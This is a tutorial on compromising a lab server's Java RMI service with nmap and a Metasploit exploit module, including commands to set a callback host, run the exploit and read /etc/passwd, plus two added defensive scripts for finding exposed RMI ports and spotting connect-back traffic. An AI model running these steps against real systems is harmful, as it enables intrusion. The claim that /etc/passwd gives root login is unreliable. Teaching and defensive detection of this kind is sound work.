Java is rarely updated on web servers, so more often than not when you see it on a web server it will be way out of date. This makes it easy for attackers to get in. Here we find a server running Java RMI on port 1099 and show how we can then fully compromise the server in under 3 minutes and access the password file.
We touch on this time and again: just how important it is to stay up to date with application and OS versions. This again shows that if you are not updating even one component on your web server, it is at risk of being compromised very quickly.
In this tutorial we use just nmap and the Metasploit Framework, which are built into Kali Linux, which we use for most of our tutorials. Download it here: https://www.kali.org/downloads/
First we scan the web server, which has an IP address of 192.168.56.103, with nmap to identify open ports and the services running on them, using the following command.
nmap -sV 192.168.56.103
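A defender would want the same scan to feed an inventory check rather than an exploit. The script below is an added example, not part of the original tutorial: it parses the normal-format output of `nmap -sV` and reports every open port that nmap identified as a Java RMI registry, so exposed RMI endpoints can be found and patched or firewalled before anyone else finds them. The scan text embedded in it is constructed for illustration (the hosts, ports and version banners are not real scan results), and the service names it matches are nmap's own labels for the RMI registry.

```python
"""Flag hosts exposing a Java RMI registry in `nmap -sV` output.

Added example (not from the original tutorial): a defender's inventory
check over the normal-format output of `nmap -sV`.  The scan text below
is constructed for illustration; hosts, ports and banners are not real
scan results.
"""
import re

# Constructed sample of `nmap -sV` normal output (not a real scan).
SAMPLE_SCAN = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-01 10:00 UTC
Nmap scan report for 192.168.56.103
Host is up (0.00021s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.9p1 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.38
1099/tcp open  java-rmi Java RMI
8009/tcp open  ajp13    Apache Jserv (Protocol v1.3)
Service Info: OS: Linux

Nmap scan report for 192.168.56.110
Host is up (0.00030s latency).
PORT     STATE SERVICE  VERSION
443/tcp  open  ssl/http nginx 1.18.0
1099/tcp filtered rmiregistry

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 12.34 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# nmap's service names for the RMI registry: "rmiregistry" is the
# port-based guess from nmap-services, "java-rmi" is what -sV probes report.
RMI_SERVICES = {"java-rmi", "rmiregistry"}


def parse_nmap_services(text):
    """Return one dict per port line: host, port, proto, state, service, version."""
    records = []
    host = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and host is not None:
            port, proto, state, service, version = m.groups()
            records.append({
                "host": host,
                "port": int(port),
                "proto": proto,
                "state": state,
                "service": service,
                "version": (version or "").strip(),
            })
    return records


def find_rmi_exposure(records):
    """Return (host, port, version) for every open port that looks like Java RMI."""
    hits = []
    for r in records:
        if r["state"] != "open":
            continue  # filtered/closed ports are not reachable exposure
        looks_like_rmi = (
            r["service"] in RMI_SERVICES
            or "java rmi" in r["version"].lower()
        )
        if looks_like_rmi:
            hits.append((r["host"], r["port"], r["version"]))
    return hits


if __name__ == "__main__":
    for host, port, version in find_rmi_exposure(parse_nmap_services(SAMPLE_SCAN)):
        print(f"{host}:{port} exposes Java RMI ({version or 'no version banner'})")
```

Run against a real scan by piping `nmap -sV <range>` into a file and passing its text to `parse_nmap_services`; any host the check reports should have its Java runtime version reviewed and the RMI port restricted to the clients that actually need it.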
Next we head over to the Metasploit Framework to search for any built-in exploits we may be able to use.
search type:exploit platform:java rmi
The command above is pretty self-explanatory: we are performing a search with a type of “exploit”, for the platform “java”, with the additional keyword “rmi”. We receive the following output:
To load this module we use the “use” command.
It informs us it has already selected a payload, so next we list the “info” page.
Then, once we are happy that we know what we need to configure, we load the options.
We can see in the options what is required and what is not by reading the “required” column.
Everything is set for us except the RHOSTS and LHOST settings, which we need to ensure have the correct IP addresses.
- RHOSTS – the remote host(s), i.e. the victim machine(s). We need to set the correct IP address so the exploit knows which machine(s) to target.
- LHOST – the listening host. This is your machine's IP address, so the exploit knows which machine to connect back to with the remote session it spawns.
We do this with the “set” command:
set RHOSTS 192.168.56.103
set LHOST 192.168.56.106
Now that we have everything configured we just give the “run” command, which starts the exploit against the victim, and you can see from the video just how quick it is.
All we do now in the demo video is run the “sysinfo” command to show we are on the victim server, and then we access the password file by using:
cat /etc/passwd
“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can log in as admin/root and do whatever we want. All because no one updated Java!
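The LHOST description above is also the detection opportunity: the exploit works by making the victim connect back to the attacker's listening host, so on the defending side the server accepts an inbound connection on the RMI registry port and, within seconds, opens an outbound connection to that same peer. Servers rarely initiate sessions to arbitrary hosts, so that pairing is worth an alert. The script below is an added example, not part of the original tutorial: it runs that check over firewall-style connection records. The log lines, the 9001 callback port and the 60-second window are constructed/assumed values chosen for illustration.

```python
"""Spot an RMI-connect-then-callback pattern in connection logs.

Added example (not from the original tutorial).  A hit is an inbound TCP
connection to a monitored server on the RMI registry port followed, within
a short window, by an outbound TCP connection from that server back to the
same peer.  The log lines, callback port and window are constructed/assumed.
"""
from datetime import datetime, timedelta
import re

RMI_PORT = 1099
CALLBACK_WINDOW = timedelta(seconds=60)  # assumed tuning value

# Constructed firewall-style connection log (not real traffic).
SAMPLE_LOG = """\
2021-01-01T10:00:00Z tcp 192.168.56.50:51000 -> 192.168.56.103:80
2021-01-01T10:00:05Z tcp 192.168.56.106:45210 -> 192.168.56.103:1099
2021-01-01T10:00:07Z tcp 192.168.56.103:38844 -> 192.168.56.106:9001
2021-01-01T10:02:00Z tcp 192.168.56.103:38850 -> 192.168.56.5:53
2021-01-01T10:05:00Z tcp 192.168.56.51:52000 -> 192.168.56.103:1099
2021-01-01T10:09:00Z tcp 192.168.56.103:38900 -> 192.168.56.51:9001
"""

LINE_RE = re.compile(
    r"^(\S+) (tcp|udp) (\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)$"
)


def parse_connections(text):
    """Parse log lines into (time, proto, src_ip, src_port, dst_ip, dst_port)."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore anything that is not a connection record
        ts, proto, sip, sport, dip, dport = m.groups()
        conns.append((
            datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            proto, sip, int(sport), dip, int(dport),
        ))
    return conns


def find_rmi_callbacks(conns, servers, window=CALLBACK_WINDOW):
    """Return (server, peer, rmi_time, callback_time, callback_port) tuples.

    `servers` is the set of IPs whose RMI port is being watched.  Any
    connection the server itself opens to the RMI peer within `window`
    of the inbound RMI connection is reported, whatever its port.
    """
    hits = []
    inbound = [c for c in conns if c[1] == "tcp" and c[4] in servers and c[5] == RMI_PORT]
    for t_in, _, peer, _, server, _ in inbound:
        for t_out, proto, sip, _, dip, dport in conns:
            if proto != "tcp" or sip != server or dip != peer:
                continue
            if t_in <= t_out <= t_in + window:
                hits.append((server, peer, t_in, t_out, dport))
    return hits


if __name__ == "__main__":
    conns = parse_connections(SAMPLE_LOG)
    for server, peer, t_in, t_out, port in find_rmi_callbacks(conns, {"192.168.56.103"}):
        delay = (t_out - t_in).total_seconds()
        print(f"ALERT {server} connected back to {peer}:{port} "
              f"{delay:.0f}s after an RMI connection at {t_in.isoformat()}")
```

In the constructed log only the first RMI peer triggers an alert; the second one's outbound connection arrives four minutes later and falls outside the window. Tune the window to your environment, and treat any alert as a reason to check the server's Java version and RMI exposure as well as the session itself.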